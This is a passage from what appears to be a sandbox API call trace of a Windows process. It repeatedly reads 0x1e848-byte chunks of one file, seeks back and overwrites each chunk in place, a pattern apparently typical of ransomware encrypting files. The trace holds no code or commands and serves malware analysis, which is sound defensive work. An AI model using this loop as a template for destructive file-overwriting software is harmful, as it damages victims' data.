lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0108.045] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ab3f00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.045] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0108.046] GetProcessHeap () returned 0x500000 [0108.046] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0108.046] GetProcessHeap () returned 0x500000 [0108.046] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0108.046] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1af0f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.046] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0110.080] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1af0f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.080] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0110.081] GetProcessHeap () returned 0x500000 [0110.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0110.081] GetProcessHeap () returned 0x500000 [0110.081] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0110.081] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1b2e020, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.081] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0111.300] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1b2e020, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.300] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0111.300] GetProcessHeap () returned 0x500000 [0111.300] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0111.300] GetProcessHeap () returned 0x500000 [0111.300] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0111.301] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1b6b0b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.301] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0111.310] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1b6b0b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.310] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0111.310] GetProcessHeap () returned 0x500000 [0111.310] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0111.310] GetProcessHeap () returned 0x500000 [0111.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0111.311] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ba8140, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.311] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0111.320] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ba8140, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.320] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0111.320] GetProcessHeap () returned 0x500000 [0111.320] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0111.321] GetProcessHeap () returned 0x500000 [0111.321] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0111.321] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1be51d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.321] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0111.335] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1be51d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.335] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0111.337] GetProcessHeap () returned 0x500000 [0111.337] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0111.337] GetProcessHeap () returned 0x500000 [0111.337] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0111.337] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1c22260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.337] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0111.368] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1c22260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.368] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0111.368] GetProcessHeap () returned 0x500000 [0111.368] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0111.368] GetProcessHeap () returned 0x500000 [0111.368] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0111.368] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1c5f2f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.368] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0111.375] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1c5f2f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.375] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0111.375] GetProcessHeap () returned 0x500000 [0111.375] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0111.375] GetProcessHeap () returned 0x500000 [0111.375] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0111.376] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1c9c380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.376] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0111.421] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1c9c380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.421] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0111.422] GetProcessHeap () returned 0x500000 [0111.422] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0111.422] GetProcessHeap () returned 0x500000 [0111.422] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0111.422] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1cd9410, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.422] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0111.430] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1cd9410, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.430] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0111.430] GetProcessHeap () returned 0x500000 [0111.430] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0111.431] GetProcessHeap () returned 0x500000 [0111.431] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0111.431] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1d164a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.431] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0111.444] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1d164a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.444] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0111.445] GetProcessHeap () returned 0x500000 [0111.445] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0111.445] GetProcessHeap () returned 0x500000 [0111.445] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0111.445] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1d53530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0112.629] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1d53530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.629] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0112.630] GetProcessHeap () returned 0x500000 [0112.630] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0112.630] GetProcessHeap () returned 0x500000 [0112.630] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0112.630] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1d905c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.630] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0112.920] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1d905c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.921] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0112.921] GetProcessHeap () returned 0x500000 [0112.921] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0112.921] GetProcessHeap () returned 0x500000 [0112.922] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0112.922] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1dcd650, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.922] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0112.932] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1dcd650, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.932] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0112.933] GetProcessHeap () returned 0x500000 [0112.933] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0112.933] GetProcessHeap () returned 0x500000 [0112.933] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0112.933] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1e0a6e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.933] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0112.951] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1e0a6e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.951] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0112.952] GetProcessHeap () returned 0x500000 [0112.952] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0112.952] GetProcessHeap () returned 0x500000 [0112.952] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0112.952] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1e47770, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.952] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.010] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1e47770, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.010] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.011] GetProcessHeap () returned 0x500000 [0113.011] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.011] GetProcessHeap () returned 0x500000 [0113.011] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.011] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1e84800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.011] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.022] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1e84800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.022] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.023] GetProcessHeap () returned 0x500000 [0113.023] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.023] GetProcessHeap () returned 0x500000 [0113.023] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.023] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ec1890, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.023] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.034] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ec1890, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.034] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.035] GetProcessHeap () returned 0x500000 [0113.035] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.035] GetProcessHeap () returned 0x500000 [0113.035] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.035] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1efe920, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.035] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.099] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1efe920, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.099] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.101] GetProcessHeap () returned 0x500000 [0113.101] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.101] GetProcessHeap () returned 0x500000 [0113.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.101] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1f3b9b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.101] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.113] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1f3b9b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.113] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.114] GetProcessHeap () returned 0x500000 [0113.114] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.114] GetProcessHeap () returned 0x500000 [0113.114] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.114] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1f78a40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.114] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.141] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1f78a40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.141] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.142] GetProcessHeap () returned 0x500000 [0113.142] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.142] GetProcessHeap () returned 0x500000 [0113.142] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.142] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1fb5ad0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.142] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.151] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1fb5ad0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.151] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.152] GetProcessHeap () returned 0x500000 [0113.152] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.152] GetProcessHeap () returned 0x500000 [0113.152] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.152] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ff2b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.152] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.200] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ff2b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.200] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.202] GetProcessHeap () returned 0x500000 [0113.202] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.202] GetProcessHeap () returned 0x500000 [0113.202] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.202] 